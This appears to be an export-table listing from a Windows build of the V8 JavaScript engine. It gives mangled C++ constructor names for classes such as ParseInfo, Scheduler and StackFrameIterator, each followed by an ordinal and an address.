                                                                                                                                                                                                                                    ??0OptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$Handle@VJSFunction@internal@v8@@@12@W4CodeKind@12@VBytecodeOffset@12@PEAVJavaScriptFrame@12@@Z8630x140be01f0
                                                                                                                                                                                                                                    ??0OptimizedCompilationInfo@internal@v8@@QEAA@V?$Vector@$$CBD@base@2@PEAVZone@12@W4CodeKind@12@@Z8640x140be0420
                                                                                                                                                                                                                                    ??0OptimizingCompileDispatcher@internal@v8@@QEAA@PEAVIsolate@12@@Z8650x1407f6120
                                                                                                                                                                                                                                    ??0OrderedHashMap@internal@v8@@IEAA@_K@Z8660x140097ad0
                                                                                                                                                                                                                                    ??0OrderedHashMap@internal@v8@@QEAA@XZ8670x14010d5b0
                                                                                                                                                                                                                                    ??0OrderedHashSet@internal@v8@@IEAA@_K@Z8680x140097ad0
                                                                                                                                                                                                                                    ??0OrderedHashSet@internal@v8@@QEAA@XZ8690x14010d5b0
                                                                                                                                                                                                                                    ??0OrderedNameDictionary@internal@v8@@IEAA@_K@Z8700x140097ad0
                                                                                                                                                                                                                                    ??0OrderedNameDictionary@internal@v8@@QEAA@XZ8710x14010d5b0
                                                                                                                                                                                                                                    ??0OutputStream@v8@@QEAA@AEBV01@@Z8720x140098af0
                                                                                                                                                                                                                                    ??0OutputStream@v8@@QEAA@XZ8730x140098af0
                                                                                                                                                                                                                                    ??0OverrideEmbedderStackStateScope@testing@cppgc@@QEAA@AEAVHeapHandle@2@W4EmbedderStackState@2@@Z8740x140504e20
                                                                                                                                                                                                                                    ??0PageAllocator@base@v8@@QEAA@AEBV012@@Z8750x140ff6320
                                                                                                                                                                                                                                    ??0PageAllocator@base@v8@@QEAA@XZ8760x140ff6340
                                                                                                                                                                                                                                    ??0PageBackend@internal@cppgc@@QEAA@AEAVPageAllocator@v8@@AEAVFatalOutOfMemoryHandler@12@@Z8770x14050cea0
                                                                                                                                                                                                                                    ??0PageMemory@internal@cppgc@@QEAA@VMemoryRegion@12@0@Z8780x140504440
                                                                                                                                                                                                                                    ??0PageMemoryRegion@internal@cppgc@@IEAA@AEAVPageAllocator@v8@@AEAVFatalOutOfMemoryHandler@12@VMemoryRegion@12@_N@Z8790x14050cfb0
                                                                                                                                                                                                                                    ??0PageMemoryRegionTree@internal@cppgc@@QEAA@AEBV012@@Z8800x140504460
                                                                                                                                                                                                                                    ??0PageMemoryRegionTree@internal@cppgc@@QEAA@XZ8810x14050cfe0
                                                                                                                                                                                                                                    ??0PagedSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@PEAVFreeList@12@PEAVLinearAllocationArea@12@W4CompactionSpaceKind@12@@Z8820x140aac180
                                                                                                                                                                                                                                    ??0PagedSpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z8830x140537bf0
                                                                                                                                                                                                                                    ??0PagedSpaceObjectIterator@internal@v8@@QEAA@$$QEAV012@@Z8840x140537c00
                                                                                                                                                                                                                                    ??0PagedSpaceObjectIterator@internal@v8@@QEAA@AEBV012@@Z8850x140537c00
                                                                                                                                                                                                                                    ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@@Z8860x140aac270
                                                                                                                                                                                                                                    ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@PEAVPage@12@@Z8870x140aac2d0
                                                                                                                                                                                                                                    ??0ParallelMove@compiler@internal@v8@@QEAA@PEAVZone@23@@Z8880x14057d300
                                                                                                                                                                                                                                    ??0ParseInfo@internal@v8@@AEAA@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@PEAVReusableUnoptimizedCompileState@12@_KPEAVRuntimeCallStats@12@@Z8890x1408c8460
                                                                                                                                                                                                                                    ??0ParseInfo@internal@v8@@QEAA@PEAVIsolate@12@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@PEAVReusableUnoptimizedCompileState@12@@Z8900x1408c84e0
                                                                                                                                                                                                                                    ??0ParseInfo@internal@v8@@QEAA@PEAVLocalIsolate@12@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@PEAVReusableUnoptimizedCompileState@12@_K@Z8910x1408c8560
                                                                                                                                                                                                                                    ??0Parser@internal@v8@@QEAA@PEAVLocalIsolate@12@PEAVParseInfo@12@V?$Handle@VScript@internal@v8@@@12@@Z8920x1408b94a0
                                                                                                                                                                                                                                    ??0PauseAllocationObserversScope@internal@v8@@QEAA@PEAVHeap@12@@Z8930x140b4a0a0
                                                                                                                                                                                                                                    ??0PersistentHandleVisitor@v8@@QEAA@AEBV01@@Z8940x1400972b0
                                                                                                                                                                                                                                    ??0PersistentHandleVisitor@v8@@QEAA@XZ8950x1400972b0
                                                                                                                                                                                                                                    ??0PersistentHandles@internal@v8@@QEAA@PEAVIsolate@12@@Z8960x140b4a5d0
                                                                                                                                                                                                                                    ??0PersistentHandlesScope@internal@v8@@QEAA@PEAVIsolate@12@@Z8970x140b4a650
                                                                                                                                                                                                                                    ??0PersistentRegion@internal@cppgc@@QEAA@AEBVFatalOutOfMemoryHandler@12@@Z8980x14050bef0
                                                                                                                                                                                                                                    ??0PersistentRegionBase@internal@cppgc@@IEAA@AEBVFatalOutOfMemoryHandler@12@@Z8990x14050bed0
                                                                                                                                                                                                                                    ??0PersistentRegionLock@internal@cppgc@@QEAA@XZ9000x14050bf30
                                                                                                                                                                                                                                    ??0PhiInstruction@compiler@internal@v8@@QEAA@$$QEAV0123@@Z9010x14057deb0
                                                                                                                                                                                                                                    ??0PhiInstruction@compiler@internal@v8@@QEAA@AEBV0123@@Z9020x14057df00
                                                                                                                                                                                                                                    ??0PhiInstruction@compiler@internal@v8@@QEAA@PEAVZone@23@H_K@Z9030x14102d4d0
                                                                                                                                                                                                                                    ??0Platform@cppgc@@QEAA@AEBV01@@Z9040x140537c40
                                                                                                                                                                                                                                    ??0Platform@cppgc@@QEAA@XZ9050x140537c40
                                                                                                                                                                                                                                    ??0PlatformAwareObjectStartBitmap@internal@cppgc@@QEAA@PEAE@Z9060x14051a0f0
                                                                                                                                                                                                                                    ??0PrefinalizerRegistration@internal@cppgc@@QEAA@PEAXP6A_NAEBVLivenessBroker@2@0@Z@Z9070x14050b6b0
                                                                                                                                                                                                                                    ??0PreparseDataBuilder@internal@v8@@QEAA@PEAVZone@12@PEAV012@PEAV?$vector@PEAXV?$allocator@PEAX@std@@@std@@@Z9080x1408b6310
                                                                                                                                                                                                                                    ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@AEBV0123@@Z9090x140a97af0
                                                                                                                                                                                                                                    ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAV123@@Z9100x140b3a750
                                                                                                                                                                                                                                    ??0ProfileNode@internal@v8@@QEAA@PEAVProfileTree@12@PEAVCodeEntry@12@PEAV012@H@Z9110x140861d40
                                                                                                                                                                                                                                    ??0ProfileTree@internal@v8@@QEAA@PEAVIsolate@12@PEAVCodeEntryStorage@12@@Z9120x140865260
                                                                                                                                                                                                                                    ??0ProfilerCodeObserver@internal@v8@@QEAA@PEAVIsolate@12@AEAVCodeEntryStorage@12@@Z9130x14087a340
                                                                                                                                                                                                                                    ??0ProfilerEventsProcessor@internal@v8@@IEAA@PEAVIsolate@12@PEAVSymbolizer@12@PEAVProfilerCodeObserver@12@PEAVCpuProfilesCollection@12@@Z9140x14087a3a0
                                                                                                                                                                                                                                    ??0ProfilerListener@internal@v8@@QEAA@PEAVIsolate@12@PEAVCodeEventObserver@12@AEAVCodeEntryStorage@12@AEAVWeakCodeRegistry@12@W4CpuProfilingNamingMode@2@@Z9150x140862010
                                                                                                                                                                                                                                    ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@0@Z9160x140c76bb0
                                                                                                                                                                                                                                    ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@@Z9170x140c76c10
                                                                                                                                                                                                                                    ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@_N@Z9180x140c76c60
                                                                                                                                                                                                                                    ??0PropertyDescriptor@v8@@QEAA@XZ9190x140c76cd0
                                                                                                                                                                                                                                    ??0PropertyIterator@debug@v8@@QEAA@AEBV012@@Z9200x140537c50
                                                                                                                                                                                                                                    ??0PropertyIterator@debug@v8@@QEAA@XZ9210x140537c50
                                                                                                                                                                                                                                    ??0RandomNumberGenerator@base@v8@@QEAA@XZ9220x140ffcc20
                                                                                                                                                                                                                                    ??0RandomNumberGenerator@base@v8@@QEAA@_J@Z9230x140ff3060
                                                                                                                                                                                                                                    ??0RawHeap@internal@cppgc@@QEAA@PEAVHeapBase@12@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@std@@@Z9240x14050ae00
                                                                                                                                                                                                                                    ??0RawMachineAssembler@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCallDescriptor@123@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@MachineOperatorBuilder@123@@Z9250x141217d60
                                                                                                                                                                                                                                    ??0RawMachineLabel@compiler@internal@v8@@QEAA@W4Type@0123@@Z9260x1410a5ba0
                                                                                                                                                                                                                                    ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEBVReadOnlyHeap@12@@Z9270x140aaac80
                                                                                                                                                                                                                                    ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEBVReadOnlySpace@12@@Z9280x140aaacc0
                                                                                                                                                                                                                                    ??0ReadOnlySerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@@Z9290x1407deb30
                                                                                                                                                                                                                                    ??0ReadOnlySpace@internal@v8@@QEAA@PEAVHeap@12@@Z9300x140aa9cc0
                                                                                                                                                                                                                                    ??0Recorder@metrics@v8@@QEAA@AEBV012@@Z9310x140537c60
                                                                                                                                                                                                                                    ??0Recorder@metrics@v8@@QEAA@XZ9320x140537c60
                                                                                                                                                                                                                                    ??0RecursiveMutex@base@v8@@QEAA@XZ9330x140feeae0
                                                                                                                                                                                                                                    ??0Reducer@compiler@internal@v8@@QEAA@AEBV0123@@Z9340x141033ce0
                                                                                                                                                                                                                                    ??0Reducer@compiler@internal@v8@@QEAA@XZ9350x141033ce0
                                                                                                                                                                                                                                    ??0RedundancyElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVZone@23@@Z9360x1411d3f50
                                                                                                                                                                                                                                    ??0RegExpBytecodeGenerator@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@@Z9370x1408537c0
                                                                                                                                                                                                                                    ??0RegExpMacroAssemblerX64@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@W4Mode@NativeRegExpMacroAssembler@12@H@Z9380x14056da80
                                                                                                                                                                                                                                    ??0RegionAllocator@base@v8@@QEAA@_K00@Z9390x141000210
                                                                                                                                                                                                                                    ??0Register@interpreter@internal@v8@@QEAA@H@Z9400x140537c70
                                                                                                                                                                                                                                    ??0RegisterConfiguration@internal@v8@@QEAA@AEBV012@@Z9410x1405f3c00
                                                                                                                                                                                                                                    ??0RegisterConfiguration@internal@v8@@QEAA@W4AliasingKind@12@HHHHHHPEBH11@Z9420x140bdf160
                                                                                                                                                                                                                                    ??0RegisterState@v8@@QEAA@AEBU01@@Z9430x140c76d20
                                                                                                                                                                                                                                    ??0RegisterState@v8@@QEAA@XZ9440x140c76af0
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@AEAA@VCode@12@_K1PEBE2H@Z9450x140bde080
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@AEBVCodeDesc@12@H@Z9460x140bde0d0
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@PEAVEmbeddedData@12@VCode@12@H@Z9470x140bde130
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@V?$Vector@E@base@2@V?$Vector@$$CBE@42@_KH@Z9480x140bde380
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@VCode@12@H@Z9490x140bde3e0
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@VCode@12@VByteArray@12@H@Z9500x140bde450
                                                                                                                                                                                                                                    ??0RelocIterator@internal@v8@@QEAA@VCodeReference@12@H@Z9510x140bde4b0
                                                                                                                                                                                                                                    ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z9520x1404e3f80
                                                                                                                                                                                                                                    ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z9530x1404e3f80
                                                                                                                                                                                                                                    ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@XZ9540x1404e3f80
                                                                                                                                                                                                                                    ??0RepresentationChanger@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVSimplifiedLoweringVerifier@123@@Z9550x141254ed0
                                                                                                                                                                                                                                    ??0ResourceConstraints@v8@@QEAA@XZ9560x140098070
                                                                                                                                                                                                                                    ??0ResumeJumpTarget@compiler@internal@v8@@AEAA@HHH@Z9570x141247140
                                                                                                                                                                                                                                    ??0ReusableUnoptimizedCompileState@internal@v8@@QEAA@PEAVIsolate@12@@Z9580x1408c85e0
                                                                                                                                                                                                                                    ??0ReusableUnoptimizedCompileState@internal@v8@@QEAA@PEAVLocalIsolate@12@@Z9590x1408c86c0
                                                                                                                                                                                                                                    ??0RuntimeCallStats@internal@v8@@QEAA@W4ThreadType@012@@Z9600x1400972c0
                                                                                                                                                                                                                                    ??0SafeForTerminationScope@Isolate@v8@@QEAA@PEAV12@@Z9610x140c76db0
                                                                                                                                                                                                                                    ??0SafepointScope@internal@v8@@QEAA@PEAVHeap@12@@Z9620x140aa8b50
                                                                                                                                                                                                                                    ??0SameThreadEnabledCheckingPolicyBase@internal@cppgc@@QEAA@XZ9630x14010d5b0
                                                                                                                                                                                                                                    ??0Sampler@sampler@v8@@QEAA@PEAVIsolate@2@@Z9640x140a1f940
                                                                                                                                                                                                                                    ??0SamplingEventsProcessor@internal@v8@@QEAA@PEAVIsolate@12@PEAVSymbolizer@12@PEAVProfilerCodeObserver@12@PEAVCpuProfilesCollection@12@VTimeDelta@base@2@_N@Z9650x14087a540
                                                                                                                                                                                                                                    ??0SaveAndSwitchContext@internal@v8@@QEAA@PEAVIsolate@12@VContext@12@@Z9660x140b62680
                                                                                                                                                                                                                                    ??0SaveContext@internal@v8@@QEAA@PEAVIsolate@12@@Z9670x140b626c0
                                                                                                                                                                                                                                    ??0Scanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@VUnoptimizedCompileFlags@12@@Z9680x14087eaa0
                                                                                                                                                                                                                                    ??0Schedule@compiler@internal@v8@@QEAA@PEAVZone@23@_K@Z9690x141067510
                                                                                                                                                                                                                                    ??0ScheduledErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z9700x140617f20
                                                                                                                                                                                                                                    ??0Scheduler@compiler@internal@v8@@AEAA@PEAVZone@23@PEAVGraph@123@PEAVSchedule@123@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@3@_KPEAVTickCounter@23@PEBVProfileDataFromFile@23@@Z9710x1411d5910
                                                                                                                                                                                                                                    ??0Scheduler@compiler@internal@v8@@QEAA@$$QEAV0123@@Z9720x1410932b0
                                                                                                                                                                                                                                    ??0Scheduler@compiler@internal@v8@@QEAA@AEBV0123@@Z9730x141093480
                                                                                                                                                                                                                                    ??0Scope@GCTracer@internal@v8@@QEAA@PEAV123@W4ScopeId@0123@W4ThreadKind@23@@Z9740x140a97bf0
                                                                                                                                                                                                                                    ??0Scope@Isolate@v8@@QEAA@PEAV12@@Z9750x1400980f0
                                                                                                                                                                                                                                    ??0Scope@internal@v8@@AEAA@PEAVZone@12@PEBVAstRawString@12@W4MaybeAssignedFlag@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z9760x140c61ee0
                                                                                                                                                                                                                                    ??0Scope@internal@v8@@AEAA@PEAVZone@12@W4ScopeType@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z9770x140c62010
                                                                                                                                                                                                                                    ??0Scope@internal@v8@@IEAA@PEAVZone@12@@Z9780x140c62140
                                                                                                                                                                                                                                    ??0Scope@internal@v8@@QEAA@$$QEAV012@@Z9790x1407fe560
                                                                                                                                                                                                                                    ??0Scope@internal@v8@@QEAA@PEAVZone@12@PEAV012@W4ScopeType@12@@Z9800x140c621c0
                                                                                                                                                                                                                                    ??0ScopeIterator@debug@v8@@QEAA@XZ9810x140537c50
                                                                                                                                                                                                                                    ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAV?$CodeAssemblerParameterizedLabel@VObject@internal@v8@@@123@@Z9820x1410a5bc0
                                                                                                                                                                                                                                    ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAVCodeAssemblerLabel@123@PEAV?$TypedCodeAssemblerVariable@VObject@internal@v8@@@123@@Z9830x1410a5c30
                                                                                                                                                                                                                                    ??0ScriptData@Coverage@debug@v8@@AEAA@_KV?$shared_ptr@VCoverage@internal@v8@@@std@@@Z9840x140bc8470
                                                                                                                                                                                                                                    ??0ScriptData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z9850x140536ac0
                                                                                                                                                                                                                                    ??0ScriptData@TypeProfile@debug@v8@@AEAA@_KV?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z9860x140bc8470
                                                                                                                                                                                                                                    ??0ScriptData@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z9870x140536ac0
                                                                                                                                                                                                                                    ??0ScriptIterator@SharedFunctionInfo@internal@v8@@QEAA@PEAVIsolate@23@VScript@23@@Z9880x1408ebae0
                                                                                                                                                                                                                                    ??0ScriptOrigin@v8@@QEAA@PEAVIsolate@1@V?$Local@VValue@v8@@@1@HH_NH1222V?$Local@VData@v8@@@1@@Z9890x140097980
                                                                                                                                                                                                                                    ??0ScriptStreamingTask@ScriptCompiler@v8@@AEAA@PEAUScriptStreamingData@internal@2@@Z9900x140097ad0
                                                                                                                                                                                                                                    ??0SealHandleScope@v8@@QEAA@PEAVIsolate@1@@Z9910x140c76dd0
                                                                                                                                                                                                                                    ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z9920x1404e3f80
                                                                                                                                                                                                                                    ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@AEBV01234@@Z9930x1404e3f80
                                                                                                                                                                                                                                    ??0SearchMatch@API@Debugger@protocol@v8_inspector@@QEAA@XZ9940x1404e3f80
                                                                                                                                                                                                                                    ??0SegmentBase@internal@base@heap@@QEAA@G@Z9950x140503b80
                                                                                                                                                                                                                                    ??0Semaphore@base@v8@@QEAA@H@Z9960x140ffb4e0
                                                                                                                                                                                                                                    ??0SetupIsolateDelegate@internal@v8@@QEAA@AEBV012@@Z9970x140a30920
                                                                                                                                                                                                                                    ??0SetupIsolateDelegate@internal@v8@@QEAA@_N@Z9980x140a30940
                                                                                                                                                                                                                                    ??0SharedFunctionInfoRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z9990x14057dfd0
                                                                                                                                                                                                                                    ??0SharedHeapSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVReadOnlySerializer@12@@Z10000x1407d5060
                                                                                                                                                                                                                                    ??0SharedMemoryStatistics@v8@@QEAA@XZ10010x14009a1b0
                                                                                                                                                                                                                                    ??0SharedMutex@base@v8@@QEAA@XZ10020x14010d5b0
                                                                                                                                                                                                                                    ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10030x140558ff0
                                                                                                                                                                                                                                    ??0SharedTurboAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z10040x140559050
                                                                                                                                                                                                                                    ??0SignatureMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z10050x140537c80
                                                                                                                                                                                                                                    ??0SignatureMap@wasm@internal@v8@@QEAA@XZ10060x140537d70
                                                                                                                                                                                                                                    ??0SimplifiedLowering@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@PEAVTickCounter@23@PEAVLinkage@123@PEAVOptimizedCompilationInfo@23@PEAVObserveNodeManager@123@@Z10070x1411f3620
                                                                                                                                                                                                                                    ??0SimplifiedOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z10080x1410cda30
                                                                                                                                                                                                                                    ??0SimplifiedOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@W4BranchSemantics@123@@Z10090x1411fb7d0
                                                                                                                                                                                                                                    ??0SnapshotCreator@v8@@QEAA@PEAVIsolate@1@PEB_JPEAVStartupData@1@@Z10100x140c76e10
                                                                                                                                                                                                                                    ??0SnapshotCreator@v8@@QEAA@PEB_JPEAVStartupData@1@@Z10110x140c76f10
                                                                                                                                                                                                                                    ??0SnapshotData@internal@v8@@IEAA@XZ10120x14061c780
                                                                                                                                                                                                                                    ??0SnapshotData@internal@v8@@QEAA@$$QEAV012@@Z10130x14061c7a0
                                                                                                                                                                                                                                    ??0SnapshotData@internal@v8@@QEAA@PEBVSerializer@12@@Z10140x1407d4b40
                                                                                                                                                                                                                                    ??0SnapshotData@internal@v8@@QEAA@V?$Vector@$$CBE@base@2@@Z10150x14061c7e0
                                                                                                                                                                                                                                    ??0SourceIdAssigner@compiler@internal@v8@@QEAA@$$QEAV0123@@Z10160x141070eb0
                                                                                                                                                                                                                                    ??0SourceIdAssigner@compiler@internal@v8@@QEAA@AEBV0123@@Z10170x141070f10
                                                                                                                                                                                                                                    ??0SourceIdAssigner@compiler@internal@v8@@QEAA@_K@Z10180x141071010
                                                                                                                                                                                                                                    ??0SourceLocation@cppgc@@AEAA@PEBD0_K@Z10190x140537de0
                                                                                                                                                                                                                                    ??0SourceLocation@cppgc@@QEAA@XZ10200x14009a1b0
                                                                                                                                                                                                                                    ??0SourcePositionTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z10210x1410dd2b0
                                                                                                                                                                                                                                    ??0SourcePositionTable@internal@v8@@QEAA@XZ10220x14009a1b0
                                                                                                                                                                                                                                    ??0SourcePositionTableBuilder@internal@v8@@QEAA@$$QEAV012@@Z10230x140537df0
                                                                                                                                                                                                                                    ??0SourcePositionTableBuilder@internal@v8@@QEAA@AEBV012@@Z10240x140537e40
                                                                                                                                                                                                                                    ??0SourcePositionTableBuilder@internal@v8@@QEAA@PEAVZone@12@W4RecordingMode@012@@Z10250x140bdbbe0
                                                                                                                                                                                                                                    ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Handle@VByteArray@internal@v8@@@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z10260x140bdbc10
                                                                                                                                                                                                                                    ??0SourcePositionTableIterator@internal@v8@@QEAA@V?$Vector@$$CBE@base@2@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z10270x140bdbc70
                                                                                                                                                                                                                                    ??0SourcePositionTableIterator@internal@v8@@QEAA@VByteArray@12@W4IterationFilter@012@W4FunctionEntryFilter@012@@Z10280x140bdbcd0
                                                                                                                                                                                                                                    ??0Space@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@PEAVFreeList@12@@Z10290x140537f30
                                                                                                                                                                                                                                    ??0SpaceIterator@internal@v8@@QEAA@AEBV012@@Z10300x140538100
                                                                                                                                                                                                                                    ??0SpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z10310x140afd3d0
                                                                                                                                                                                                                                    ??0Stack@base@heap@@QEAA@PEBX@Z10320x140097ad0
                                                                                                                                                                                                                                    ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z10330x140b796c0
                                                                                                                                                                                                                                    ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@PEAVStackMemory@wasm@12@@Z10340x140b796e0
                                                                                                                                                                                                                                    ??0StackFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@PEAVThreadLocalTop@12@@Z10350x140b79790
                                                                                                                                                                                                                                    ??0StackGuard@internal@v8@@QEAA@PEAVIsolate@12@@Z10360x140538120
                                                                                                                                                                                                                                    ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z10370x1404e3f80
                                                                                                                                                                                                                                    ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z10380x1404e3f80
                                                                                                                                                                                                                                    ??0StackTrace@API@Runtime@protocol@v8_inspector@@QEAA@XZ10390x1404e3f80
                                                                                                                                                                                                                                    ??0StackTrace@debug@base@v8@@QEAA@PEAU_EXCEPTION_POINTERS@@@Z10400x140ffeab0
                                                                                                                                                                                                                                    ??0StackTrace@debug@base@v8@@QEAA@PEBQEBX_K@Z10410x140fffcc0
                                                                                                                                                                                                                                    ??0StackTrace@debug@base@v8@@QEAA@PEBU_CONTEXT@@@Z10420x140ffead0
                                                                                                                                                                                                                                    ??0StackTrace@debug@base@v8@@QEAA@XZ10430x140ffeaf0
                                                                                                                                                                                                                                    ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@@Z10440x140b79ec0
                                                                                                                                                                                                                                    ??0StackTraceFrameIterator@internal@v8@@QEAA@PEAVIsolate@12@W4StackFrameId@12@@Z10450x140b79f40
                                                                                                                                                                                                                                    ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z10460x1404e3f80
                                                                                                                                                                                                                                    ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z10470x1404e3f80
                                                                                                                                                                                                                                    ??0StackTraceId@API@Runtime@protocol@v8_inspector@@QEAA@XZ10480x1404e3f80
                                                                                                                                                                                                                                    ??0StackTraceIterator@debug@v8@@QEAA@XZ10490x140538160
                                                                                                                                                                                                                                    ??0StandaloneTestingHeap@testing@cppgc@@QEAA@AEAVHeapHandle@2@@Z10500x140097ad0
                                                                                                                                                                                                                                    ??0StartupSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVReadOnlySerializer@12@PEAVSharedHeapSerializer@12@@Z10510x1407d02b0
                                                                                                                                                                                                                                    ??0StateValuesAccess@compiler@internal@v8@@QEAA@PEAVNode@123@@Z10520x140097ad0
                                                                                                                                                                                                                                    ??0StateValuesCache@compiler@internal@v8@@QEAA@PEAVJSGraph@123@@Z10530x1410df940
                                                                                                                                                                                                                                    ??0StatsCollector@internal@cppgc@@QEAA@PEAVPlatform@2@@Z10540x140509240
                                                                                                                                                                                                                                    ??0StatsScope@ZoneStats@compiler@internal@v8@@QEAA@PEAV1234@@Z10550x1411d2c50
                                                                                                                                                                                                                                    ??0StreamedSource@ScriptCompiler@v8@@QEAA@V?$unique_ptr@VExternalSourceStream@ScriptCompiler@v8@@U?$default_delete@VExternalSourceStream@ScriptCompiler@v8@@@std@@@std@@W4Encoding@012@@Z10560x140c76f60
                                                                                                                                                                                                                                    ??0StreamingDecoder@wasm@internal@v8@@QEAA@AEBV0123@@Z10570x140638cb0
                                                                                                                                                                                                                                    ??0StreamingDecoder@wasm@internal@v8@@QEAA@XZ10580x140638d20
                                                                                                                                                                                                                                    ??0StreamingProcessor@wasm@internal@v8@@QEAA@AEBV0123@@Z10590x140638d50
                                                                                                                                                                                                                                    ??0StreamingProcessor@wasm@internal@v8@@QEAA@XZ10600x140638d50
                                                                                                                                                                                                                                    ??0String16@v8_inspector@@QEAA@PEBD@Z10610x14079fe50
                                                                                                                                                                                                                                    ??0String16@v8_inspector@@QEAA@PEBG@Z10620x14079ff80
                                                                                                                                                                                                                                    ??0StringBuffer@v8_inspector@@QEAA@AEBV01@@Z10630x1404e3fa0
                                                                                                                                                                                                                                    ??0StringBuffer@v8_inspector@@QEAA@XZ10640x1404e3fa0
                                                                                                                                                                                                                                    ??0StringTable@internal@v8@@QEAA@PEAVIsolate@12@@Z10650x1408e3dd0
                                                                                                                                                                                                                                    ??0StringView@v8_inspector@@QEAA@PEBE_K@Z10660x1404e3fb0
                                                                                                                                                                                                                                    ??0StringView@v8_inspector@@QEAA@PEBG_K@Z10670x1404e3fc0
                                                                                                                                                                                                                                    ??0StringView@v8_inspector@@QEAA@XZ10680x1404e3fd0
                                                                                                                                                                                                                                    ??0StringsStorage@internal@v8@@QEAA@XZ10690x14085e2d0
                                                                                                                                                                                                                                    ??0StubCache@internal@v8@@QEAA@PEAVIsolate@12@@Z10700x140a84a90
